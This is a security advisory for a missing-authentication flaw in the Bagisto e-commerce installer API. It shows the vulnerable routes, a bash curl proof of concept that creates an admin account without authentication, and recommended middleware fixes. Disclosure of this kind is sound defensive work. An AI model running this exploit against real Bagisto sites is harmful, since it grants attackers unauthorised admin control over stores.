CVE-2026-21446: Bagisto Missing Authentication on Installer API Endpoints
Severity: CRITICAL 9.8 (EPSS 0.14%)
Description
### Vulnerable Code

**File:** `packages/Webkul/Installer/src/Routes/web.php`

```
<?php

use Illuminate\Session\Middleware\StartSession;
use Illuminate\Support\Facades\Route;
use Webkul\Installer\Http\Controllers\InstallerController;

Route::middleware(['web', 'installer_locale'])->group(function () {
    Route::controller(InstallerController::class)->group(function () {
        Route::get('install', 'index')->name('installer.index');

        // Nothing in this group checks whether installation has already completed.
        Route::middleware(StartSession::class)->prefix('install/api')->group(function () {
            Route::post('env-file-setup', 'envFileSetup')->name('installer.env_file_setup');

            // Dropping the 'web' group also drops its CSRF check on these routes.
            Route::post('run-migration', 'runMigration')->name('installer.run_migration')->withoutMiddleware('web');

            Route::post('run-seeder', 'runSeeder')->name('installer.run_seeder')->withoutMiddleware('web');

            Route::get('download-sample', 'downloadSample')->name('installer.download_sample')->withoutMiddleware('web');

            Route::post('admin-config-setup', 'adminConfigSetup')->name('installer.admin_config_setup')->withoutMiddleware('web');

            Route::post('sample-products-setup', 'createSampleProducts')->name('installer.sample_products_setup')->withoutMiddleware('web');
        });
    });
});
```

These API routes remain active even after the initial installation is complete, allowing any unauthenticated attacker to:

- Create admin accounts
- Modify application configuration
- Potentially overwrite existing data

While the web installer UI has client-side protections, the underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the web installer entirely by calling the API endpoints directly.

### How to Reproduce

1. The web installer UI at `http://localhost:8000/install` has client-side protections.
2. **However, the API endpoints are directly exploitable:**
   - The attack works by calling `/install/api/admin-config-setup` directly via curl or any HTTP client
   - No CSRF token, session, or authentication is required
   - The web UI workflow is completely bypassed

### Proof of Concept

```
#!/bin/bash
# PoC: Create admin account without authentication

TARGET="http://localhost:8000"

# Create a new admin account
curl -X POST "$TARGET/install/api/admin-config-setup" \
  -H "Content-Type: application/json" \
  -d '{
    "admin_name": "Attacker",
    "admin_email": "[email protected]",
    "admin_password": "HackedPassword123"
  }'

echo ""
echo "New admin account created!"
echo "Login at: $TARGET/admin"
echo "Email: [email protected]"
```

### Expected Result

The API should reject unauthenticated requests with a 401/403 status.

### Actual Result

The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform.

### Recommended Patch

Add an installation-completion check:

```
// In InstallerController.php or a new middleware
public function __construct()
{
    // Check if application is already installed
    if (file_exists(base_path('.env'))
        && config('app.key')
        && \Schema::hasTable('admins')
        && \DB::table('admins')->count() > 0) {
        abort(404, 'Application already installed');
    }
}
```
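A fuller form of the recommended fix, as an added example that is not Bagisto's own code: a dedicated middleware that refuses every installer request once installation is complete, meant to be attached to the outer route group so that the per-route `->withoutMiddleware('web')` calls in the vulnerable file cannot strip it. The `storage/installed` marker file is an assumption about how the installer records completion; the database fallback mirrors the page's recommended check.

```php
<?php

namespace Webkul\Installer\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Schema;

/**
 * Hypothetical middleware (not Bagisto's own code): refuses every installer
 * request once the application is installed. Apply it at the route-group
 * level so that per-route ->withoutMiddleware('web') cannot remove it.
 */
class EnsureNotInstalled
{
    public function handle(Request $request, Closure $next)
    {
        if ($this->isInstalled()) {
            // 404 rather than 403: do not advertise that an installer exists.
            abort(404, 'Application already installed');
        }

        return $next($request);
    }

    private function isInstalled(): bool
    {
        // Assumed marker file written by the installer when it finishes.
        if (file_exists(storage_path('installed'))) {
            return true;
        }

        // Fallback mirroring the page's recommended check: an app key plus at
        // least one admin row means installation already happened.
        try {
            return (bool) config('app.key')
                && Schema::hasTable('admins')
                && DB::table('admins')->count() > 0;
        } catch (\Throwable $e) {
            // No usable database connection yet, so installation is incomplete.
            return false;
        }
    }
}
```

Register it on the outer group, e.g. `Route::middleware(['web', 'installer_locale', EnsureNotInstalled::class])`, and keep the controller-level check from the recommended patch as defence in depth.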
Affected packages (1)
- Packagist: bagisto/bagisto >= 2.3.0, < 2.3.10
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P |
| osv | CVSS 3.1 | CRITICAL 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |